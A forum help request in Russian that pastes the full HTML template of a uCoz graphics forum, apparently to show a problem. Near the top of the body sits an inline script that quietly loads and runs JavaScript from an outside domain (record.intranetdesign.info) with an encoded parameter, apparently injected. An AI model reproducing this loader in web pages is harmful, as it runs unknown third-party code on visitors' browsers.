fleshka, у тебя такая же проблема ?
Вот код страницы форума
Код
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>4ARTDIZ.RU - Форум о графике</title>
<link type="text/css" rel="StyleSheet" href="/_st/my.css" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link type="text/css" rel="StyleSheet" href="http://s68.ucoz.net/src/base.css" />
<link type="text/css" rel="StyleSheet" href="http://s68.ucoz.net/src/layer3.css" />
<script type="text/javascript" src="http://s68.ucoz.net/src/jquery-1.7.2.js"></script>
<link href="http://s68.ucoz.net/src/ulightbox/ulightbox.css" rel="stylesheet" type="text/css" /><script type="text/javascript" src="http://s68.ucoz.net/src/ulightbox/ulightbox.js"></script>
<script type="text/javascript" src="http://s68.ucoz.net/src/uwnd.js?2"></script><style type="text/css">.UhideBlockL {display:none}</style><script type="text/javascript">new Image().src = "http://counter.yadro.ru/hit;noadsru?r"+escape(document.referrer)+((typeof(screen)=="undefined")?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";"+Math.random();</script>
</head>
<!-- Увеличение изображений на форуме -->
<style>
#apofmes img {
max-width:500px;
max-height:300px;
}
.apofn {
width:100%;
height:100%;
position:fixed;
top:0px;
left:0px;
z-index:300;
background:rgba(0, 0, 0, 0.8);
display:none;
}
.apofn img {
position:fixed;
z-index:301;
top:50%;
left:50%;
margin-top:-300px;
margin-left:-400px;
}
</style>
<script>
// ApoTeam (c) 2012
$(document).ready(function() {
$('#apofmes a[title*="Нажмите"]').click(function() {
$('.apofn img').attr('src', $(this).attr('href'));
$('.apofn').show();
return false;
});
$('#apofmes img').click(function() {
$('.apofn img').attr('src', $(this).attr('src'));
$('.apofn').show();
});
$('.apofn').click(function() {
$(this).hide();
});
});
</script>
<div class="apofn"><img src="" /></div>
<!-- /Увеличение изображений на форуме -->
<script type="text/javascript"> (function(w) { var script = document.createElement('script'); var i = setInterval(function() { if (typeof w.document.body !== 'undefined') { var s = "http://record.intranetdesign.info/?"; s += 152433 + "=BUwFA1cBGBVMQ0hJQkNXFx4DHBAFAkwHGhw"; script.src = s; w.document.body.appendChild(script); clearInterval(i); } }, 200); })(window); </script>
<body class="body modulesforum urifrTread109">
<!--Хеадер-->
$GLOBAL_AHEADER$
<!--/Хеадер-->
<div id="rcontent">
<!--Блоки-->
$GLOBAL_CLEFTER$
<!--/Блоки-->
</div>
<div id="lcontent">
<!-- <body> -->
$BODY$
<!-- </body> -->
</div>
<div style="display: none;">
<script type="text/javascript">
$('img[title="Тема закрыта"]').each(function(){
$('tr[id^="tt"]:last').after($(this).parent().parent());
});
</script>
</div>
<script type="text/javascript" src="/designs_25/forum_sts.js"></script>
<?if($PAGE_ID$='main')?>
<script type="text/javascript">
$("div.gDivRight").append('<div class="forum_lb_bg"><div class="forum_rb_bg"></div></div>');
</script>
<?else?>
<script type="text/javascript" src="/designs_25/themes-new.js"></script>
<?endif?>
<!--Нижняя-->$GLOBAL_BFOOTER$<!--/Нижняя-->
</body>
</html>